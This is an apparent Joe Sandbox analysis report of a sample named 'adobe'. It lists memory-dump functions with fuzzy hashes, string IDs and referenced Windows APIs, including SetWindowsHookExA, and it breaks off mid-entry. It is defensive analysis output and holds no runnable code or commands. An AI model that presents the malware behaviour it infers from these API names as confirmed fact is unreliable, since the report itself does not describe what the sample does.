                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 8b6e49d0529393b61738b25715462ba62be7d1c10a1a2a5b3a584a02c7f41371
                        • Instruction ID: 2f408899d844993bd9f351d0104e55efa2d64e9622f7d42d8d1b1a3ff4eb48f5
                        • Opcode Fuzzy Hash: 8b6e49d0529393b61738b25715462ba62be7d1c10a1a2a5b3a584a02c7f41371
                        • Instruction Fuzzy Hash: C921E2B59002089FDB10CFAAD984ADEBFF9EB48320F14801AE958A3310D374A950CFA4
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0669A343
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 33ea6221e0cf6934f2beee394918991545e9ccae37537a618b4b23427d7942b2
                        • Instruction ID: 1ea4699169bffa0d58fdf23354b076e31d63514a9859fab5f97aab5365289636
                        • Opcode Fuzzy Hash: 33ea6221e0cf6934f2beee394918991545e9ccae37537a618b4b23427d7942b2
                        • Instruction Fuzzy Hash: 242124B5D002098FCB54CFAAC844BEEFBF5EB88324F14842AD459A7350C775A944CFA5
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE ref: 00E1EE7F
                        Memory Dump Source
                        • Source File: 00000008.00000002.4096285249.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e10000_adobe.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 89cede7fdc1a6d81564e1fee1e39ae818db1042e943c4ae8fca7fa7f7c7760c6
                        • Instruction ID: 4c3fb448cad5f442eb87f3ce997f46d93fb7a89069212c6beb5feb76674eea21
                        • Opcode Fuzzy Hash: 89cede7fdc1a6d81564e1fee1e39ae818db1042e943c4ae8fca7fa7f7c7760c6
                        • Instruction Fuzzy Hash: D011E2B1C006599BCB10DF9AC544BDEFBF4AB48324F14816AE818B7250D378A984CFE5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06691E16
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 4368d9467883c80ec7f5a7fc0bac883435a44041901217e44d4699536d1442bf
                        • Instruction ID: 6bcac1e2f706e9b6d33cbdd8f925cd9b65eaaceba3fc06473212ae406b2d3df6
                        • Opcode Fuzzy Hash: 4368d9467883c80ec7f5a7fc0bac883435a44041901217e44d4699536d1442bf
                        • Instruction Fuzzy Hash: C11102B6D0024A8FCB10DF9AC444ADEFBF9EB49214F20846AD869B7710C375A545CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06691E16
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 2a0c9e6b848be8b10e669ff585b2ebc66e6693718987daa23a02f19616935379
                        • Instruction ID: 8349c665a9105b173031cfe4e8b864005b01054db2a091b287486603c3e29fd3
                        • Opcode Fuzzy Hash: 2a0c9e6b848be8b10e669ff585b2ebc66e6693718987daa23a02f19616935379
                        • Instruction Fuzzy Hash: 0D1104B5D002498FCB10CF9AD844ADEFBF9EF49214F10841AD869B7710C375A545CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06697C35), ref: 06697CBF
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: 2abfbd8286391e74960f3fb342d7c1e72d25ff9654d9e3dc13e754a47e0bb1d8
                        • Instruction ID: c36a819104d0457930672a513bf94be4b1e16c5c8c72330558b7fd94eba5cc4b
                        • Opcode Fuzzy Hash: 2abfbd8286391e74960f3fb342d7c1e72d25ff9654d9e3dc13e754a47e0bb1d8
                        • Instruction Fuzzy Hash: 1D1103B5900249CFCB50DF9AD588BDEBFF8EB48324F20845AD959A7350C374A944CFA5
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 06698585
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: db2e9751f711ed602b604e0964013bdd1d11e536f18c7d184b73a091fb21958c
                        • Instruction ID: 7944c4c2298e0c88cae2fabf4fabb9f60282e0adbed4f89cd3f412150684a20c
                        • Opcode Fuzzy Hash: db2e9751f711ed602b604e0964013bdd1d11e536f18c7d184b73a091fb21958c
                        • Instruction Fuzzy Hash: 761145B1900348CFCB60DF9AD448BDEBBF8EB48324F10845AD519A7310C378A944CFA5
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 06698585
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: f06cda1cbdfd508a8d47d39d25e057430d11f3a92ec65381080f5344637d4731
                        • Instruction ID: b794b0a6094afcc293e6819bdb9534353c6d54decfb69d870cf0c20b1e4d5403
                        • Opcode Fuzzy Hash: f06cda1cbdfd508a8d47d39d25e057430d11f3a92ec65381080f5344637d4731
                        • Instruction Fuzzy Hash: 841133B59002488FCB50CF9AD444BDEBFF4AB48324F24845AD559A7310C375A944CFA0
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06697C35), ref: 06697CBF
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: a0567ad9ea32bcad3f4693bdd7581a1cfe64b793630e16502af0bdbae2913860
                        • Instruction ID: 426f874f005096a26a3e42cf7402bd16f95e86642ae8ee42606c56a70fb6a98f
                        • Opcode Fuzzy Hash: a0567ad9ea32bcad3f4693bdd7581a1cfe64b793630e16502af0bdbae2913860
                        • Instruction Fuzzy Hash: 1A11F2B5800249CFCB50DF9AD988BDEBFF8AB48324F20841AD959B7350C374A544CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: XPcq
                        • API String ID: 0-714321711
                        • Opcode ID: bf68c4e4e88fdd69c02ea257e994634adc819e16df0347a9c25f5961b358e41f
                        • Instruction ID: f5960d4979885d4ff0c146c07ebf4f500fe360de43986e8b274e871b9b5e827c
                        • Opcode Fuzzy Hash: bf68c4e4e88fdd69c02ea257e994634adc819e16df0347a9c25f5961b358e41f
                        • Instruction Fuzzy Hash: 15416D30A002089FDB45DFA9C854B9EBBF6EF88700F20852AD146AB395DF719C01CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 6c59e94daa72b4501579cc8a91cc43aafbd358c13e6d4d6c5527f8211c166ee3
                        • Instruction ID: f353753ae74002b8f5cd2f3a9e0804eeb9ec9ac1a5a9680f0f4e85cbb5d47602
                        • Opcode Fuzzy Hash: 6c59e94daa72b4501579cc8a91cc43aafbd358c13e6d4d6c5527f8211c166ee3
                        • Instruction Fuzzy Hash: 9C41BF70E043099FDB61DFA5C5946AEBBB2EF85300F20452AE406EB740DB71ED46CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 5b33e49fcaa839d826a3548ecae871f96042a11fedee706e7bc53596e1663ecd
                        • Instruction ID: 8a83c0b94855264f2282935cadcca3326a3f543f89266d72210609de4d66920f
                        • Opcode Fuzzy Hash: 5b33e49fcaa839d826a3548ecae871f96042a11fedee706e7bc53596e1663ecd
                        • Instruction Fuzzy Hash: A031CD30B003059FDB59AF74C92476E7BA6AFC9604F288429D406DB394EF35DE46CBA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: f6c01c8878fdada38edac544799af4f64af05e5b340e4f45a8e7e75e1c654da3
                        • Instruction ID: 91467a41358c3ccf87b80002501dbd65dc755b53bc6225eff2db01822415741c
                        • Opcode Fuzzy Hash: f6c01c8878fdada38edac544799af4f64af05e5b340e4f45a8e7e75e1c654da3
                        • Instruction Fuzzy Hash: 6E116D74B102249FDB509F78C805BAE7BF6AF88710F10846EE94ADB390EB759D00CB95
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: 16dce3e2a7436dc3bb65a3fc403e43145cc73a7f498517419e0cbce627c8a66e
                        • Instruction ID: f00bc8387258ac288629d01d64cdaa124434a1966fc5cfff363e1e3056f7cbce
                        • Opcode Fuzzy Hash: 16dce3e2a7436dc3bb65a3fc403e43145cc73a7f498517419e0cbce627c8a66e
                        • Instruction Fuzzy Hash: 10111C74B102149FDB44AF78C804B6EBBF6AF88750F10846EE90AEB394DB759D01CB85
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37bea91057d1a3bda5f6e141199f065f52c976873669f9ba19d3ee4195c6be14
                        • Instruction ID: 0a0e6cf8f6a0d5005afd0e6410695dd479c470ea4f58b9bfe661eebbf77f8285
                        • Opcode Fuzzy Hash: 37bea91057d1a3bda5f6e141199f065f52c976873669f9ba19d3ee4195c6be14
                        • Instruction Fuzzy Hash: 09A17330F102099FDF54DFA8D990BAEB7B6EB89314F108526D409E7395CA34DC828F91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7b699d3b9e3eef170029a2aa092d4bc91eff0313ea5fbf70ffcec99dfa56a43
                        • Instruction ID: 749fd05403eca0e03b263a608cfe353b452d7b5c363c836ea97237dca8a6a53e
                        • Opcode Fuzzy Hash: a7b699d3b9e3eef170029a2aa092d4bc91eff0313ea5fbf70ffcec99dfa56a43
                        • Instruction Fuzzy Hash: 8861D271F001114FCB149A7DC88466FBADBAFC4224B19443AE80EDB365DE66DD028BD2
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4369a742f92c28421cebba70aac94015848e70edd09d187d41a6ff326f44dd1e
                        • Instruction ID: 279a17ae96a32605a47ab65f9a6908da3ddfe20c37b670f4f94b4448b30c31c9
                        • Opcode Fuzzy Hash: 4369a742f92c28421cebba70aac94015848e70edd09d187d41a6ff326f44dd1e
                        • Instruction Fuzzy Hash: 84814C31B002099FDB54DFA9D8947AEB7F2AF89304F148529D40AEB384EF75EC428B51
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 507ccc5dcb28613ec24f1227d65391dccde5fe44e838981ba2f4d87b40e3c58f
                        • Instruction ID: 8365c0a0d588a0f4deecce332a134ddea8370e650995bbed54b51dcc3d934147
                        • Opcode Fuzzy Hash: 507ccc5dcb28613ec24f1227d65391dccde5fe44e838981ba2f4d87b40e3c58f
                        • Instruction Fuzzy Hash: 28911A34E102198FDB60DF68C890B9DB7B1FF89310F208699D549AB355EB70AE85CF91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f3b750af99b50bb925bacb77622652c3731756c01d8d678ff08d3b311c78799
                        • Instruction ID: b1384274bbe91e8e8275f1402baef2e5d919c1471eb49928137622745835d8ce
                        • Opcode Fuzzy Hash: 2f3b750af99b50bb925bacb77622652c3731756c01d8d678ff08d3b311c78799
                        • Instruction Fuzzy Hash: 9961D131F00205DFDB54ABB8E8553AEBBB2EB85315F20886AE10AD7350DB359D45CF92
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b7a733f6c7a5ffc73b93ba9ebba6dda35f4a2b72807f6a5a72c017c268e64a5
                        • Instruction ID: ee907d2e738f3fa0c87b8dac57f041eb1242ea7bc93e8356e5316642cbed37cf
                        • Opcode Fuzzy Hash: 7b7a733f6c7a5ffc73b93ba9ebba6dda35f4a2b72807f6a5a72c017c268e64a5
                        • Instruction Fuzzy Hash: F8912A34E106198BDF60DF68C890B9DB7B1FF89300F208699D549AB355EB70AE85CF91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 909386d4cb5c4b5e968a8ae0ebb3cf6b1e9fd91da48219b624812624a89f82f4
                        • Instruction ID: 53eedbf23fdaab4b69f9736f0efb80f6acce00c8a9c5bde358e3590ab6e826b4
                        • Opcode Fuzzy Hash: 909386d4cb5c4b5e968a8ae0ebb3cf6b1e9fd91da48219b624812624a89f82f4
                        • Instruction Fuzzy Hash: AE712970A002089FDB54DFA8D990AAEBBF6FF84300F248529E405EB355DB71ED46CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae1d7945f449e35071fe1f300d66523bed1f819d840ccb9a5f48dd47658fb828
                        • Instruction ID: 3bccf08b05e2b361a59c10d0dce80c7a79f96011c7fc388c6df8c21d0c0eeae2
                        • Opcode Fuzzy Hash: ae1d7945f449e35071fe1f300d66523bed1f819d840ccb9a5f48dd47658fb828
                        • Instruction Fuzzy Hash: 02711B70A002089FDB54EFA9D990AAEBBF6FF84300F248529E405EB355DB71ED46CB51
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 131ee69fcc5d18f976d2981afcf117b852809479e85910d5b8168947667bbf65
                        • Instruction ID: fe6ae7e20722d8a537a3ef6001b4bd55306687c45cb480567bc74641dcc78d90
                        • Opcode Fuzzy Hash: 131ee69fcc5d18f976d2981afcf117b852809479e85910d5b8168947667bbf65
                        • Instruction Fuzzy Hash: 7651D934B10314DFEFA4666CD99476F366BD789300F20492AE50ED7399CA79CC858BA3
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 512ecded07dd8efebee64ab21d5d16f83f23972a0a1aa7ae026c5cb2eb8533da
                        • Instruction ID: b2b9561ffc734970ca9485ed9f76cb645974727137d2810472629e255e15a248
                        • Opcode Fuzzy Hash: 512ecded07dd8efebee64ab21d5d16f83f23972a0a1aa7ae026c5cb2eb8533da
                        • Instruction Fuzzy Hash: 0151D534B10314DFEFA4666CD9947AF265FD789310F20492AE10ED7399CA79CC858BA3
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1083da7b0c091f4b7d4dd25be1727f042d8c054e7618d8f253c48a14bc5490c
                        • Instruction ID: a77cf798f98ef4131b071768ad9b5b692a98decb80b0f4e39b8dd828a3e101a0
                        • Opcode Fuzzy Hash: f1083da7b0c091f4b7d4dd25be1727f042d8c054e7618d8f253c48a14bc5490c
                        • Instruction Fuzzy Hash: 3D41FB71E007098FDB60CEA9D881AAEFBF2FB95310F10492AE156D7650D331ED558F91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 66ba19eeeaeb4436c9533ec6f53f3b050d61b3c20391b84cac027b0866a4871a
                        • Instruction ID: b77bc47309c07d244075a8d2dc2e9cc3af3d58ee0fe67f9a6d5af2839d3a9f60
                        • Opcode Fuzzy Hash: 66ba19eeeaeb4436c9533ec6f53f3b050d61b3c20391b84cac027b0866a4871a
                        • Instruction Fuzzy Hash: 49316B70E102059BCB59CF64D8A46AEB7B6AF89300F188529E906EB750DB71ED46CB90
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5dd62413203723a6bc367d449fa21ca7f58b5c75afba68a06b7474b0f937b904
                        • Instruction ID: 34ff36bb94e749f137ab016c278f63120e5ee4fdc843f37422edacc86359fdf2
                        • Opcode Fuzzy Hash: 5dd62413203723a6bc367d449fa21ca7f58b5c75afba68a06b7474b0f937b904
                        • Instruction Fuzzy Hash: 24317E70E102059FCB59CF64D8646AEB7B6FF89300F188529E906EB750DB71ED46CB90
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04964679d018e0361f67fa42f8c0aef79d1bfadefc8834ff485d9f83cae9e58f
                        • Instruction ID: 9c93000274dfc7b11b944f998f2bb95268343c7f7e98cb4500c680d416148e51
                        • Opcode Fuzzy Hash: 04964679d018e0361f67fa42f8c0aef79d1bfadefc8834ff485d9f83cae9e58f
                        • Instruction Fuzzy Hash: C3216675E112199FDB40DFA9D980AAEBBF5FB88710F10802AEA05E7380E771DD018F91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d14219dd257e250de013836719b8003d90820d6a2f79ab27edc465171c50687
                        • Instruction ID: d5455dea3dbbfb0b9ee0eb475123a9bbdef1818991717a9cada713a04cdace39
                        • Opcode Fuzzy Hash: 6d14219dd257e250de013836719b8003d90820d6a2f79ab27edc465171c50687
                        • Instruction Fuzzy Hash: 50216A75F112159FDB44DFA8D940BAEBBF2AB88710F14802AEA09E7394E770DD018F91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4096030585.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_dcd000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f640b3e748b188f1cd08539ad7f091f1645e258ca79e371a4f70355586e74734
                        • Instruction ID: ba5af695a86d414b2bc71f9ac2e579bd3647e8a9cfc44591b342d36abd5b27f1
                        • Opcode Fuzzy Hash: f640b3e748b188f1cd08539ad7f091f1645e258ca79e371a4f70355586e74734
                        • Instruction Fuzzy Hash: F5212C7150D3C09FD703CB24D994B11BF71AB47214F29C5EBD8898F2A7C23A985ADB62
                        Memory Dump Source
                        • Source File: 00000008.00000002.4096030585.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_dcd000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b3cebe18f904add23157df012210a226e44c20fddcfbe0c6bc1fec94a3b1b00
                        • Instruction ID: efc1248bb33c872460a28257d5b0955ac116c8f3fbbcec90e4821f077fb49c7f
                        • Opcode Fuzzy Hash: 3b3cebe18f904add23157df012210a226e44c20fddcfbe0c6bc1fec94a3b1b00
                        • Instruction Fuzzy Hash: 5521F271504205EFCB14DF18DDC0F26BBA6EB84314F24C67EE8494B296C33AD846DA72
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 407f0b84503a0afff009787ee626f961adef72bcd0ea7261bd4d5b1949d31a79
                        • Instruction ID: 35d96875e2afbd450f314bee806a0bc46ef248ccaa7a4f369354e8b726ea743a
                        • Opcode Fuzzy Hash: 407f0b84503a0afff009787ee626f961adef72bcd0ea7261bd4d5b1949d31a79
                        • Instruction Fuzzy Hash: 94119635B002105FD764DAAED85076AB7DADBC6710F24843AE54AC7391DE65DC0247A1
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0365979bdd54b0621dc637396426eeb67330cde60dc741e751d15628563e4bf7
                        • Instruction ID: 6d360ee55b24df9d4b17d3e779ba85a9e2125c8cb9caf1379e4af04d4a6905af
                        • Opcode Fuzzy Hash: 0365979bdd54b0621dc637396426eeb67330cde60dc741e751d15628563e4bf7
                        • Instruction Fuzzy Hash: 5E01DE75B002011BDB619A7DD81077AB7EADBCA320F24883BE00ACB341DE35DC428792
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a19a49ec9b0a656d2c7d0010fee1df537e57cf4538e5155350ee8a0ff66c4794
                        • Instruction ID: 0e11d58992e21690df1eeca66ae533ee753b501a11a8b8bae320694992cba38e
                        • Opcode Fuzzy Hash: a19a49ec9b0a656d2c7d0010fee1df537e57cf4538e5155350ee8a0ff66c4794
                        • Instruction Fuzzy Hash: F511A136B102245FDF949A68DC14AAF73FBABC8311F14443AD50AE7344EE65DC028BD1
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92f26eb6199fdbfec12b1ed736a93a403a2b9ed87ecceb7bf1f19a4abb7df9bc
                        • Instruction ID: 32bb00b05bd6c726318df51399e8cc0b53c31d91a0b760b70938372bd9ea4149
                        • Opcode Fuzzy Hash: 92f26eb6199fdbfec12b1ed736a93a403a2b9ed87ecceb7bf1f19a4abb7df9bc
                        • Instruction Fuzzy Hash: B821C5B5D01219AFCB10CF9AD985ADEFBB4FB49314F10812AE518A7341C374A944CFE5
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63e5b0c2e4008c6cf3b468dc16485ff6afe03367bc7b9c21d801707194753ce8
                        • Instruction ID: f912413c66208ba12f3db03edc64fc7e4450f799a982df37bac7e2ac228e1e02
                        • Opcode Fuzzy Hash: 63e5b0c2e4008c6cf3b468dc16485ff6afe03367bc7b9c21d801707194753ce8
                        • Instruction Fuzzy Hash: C901B5317042145FCB61DEBDD45171AB7D6EB46714F18887AE50ACB341DE26EC02CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13f31349104a32a08b374dd8dd79cd79f8cade41d6ce76614fd0598408ca3d52
                        • Instruction ID: a581d6bc82e360d854180a5d4c427ebccdd45d648ddef30fcb8cc960a589d063
                        • Opcode Fuzzy Hash: 13f31349104a32a08b374dd8dd79cd79f8cade41d6ce76614fd0598408ca3d52
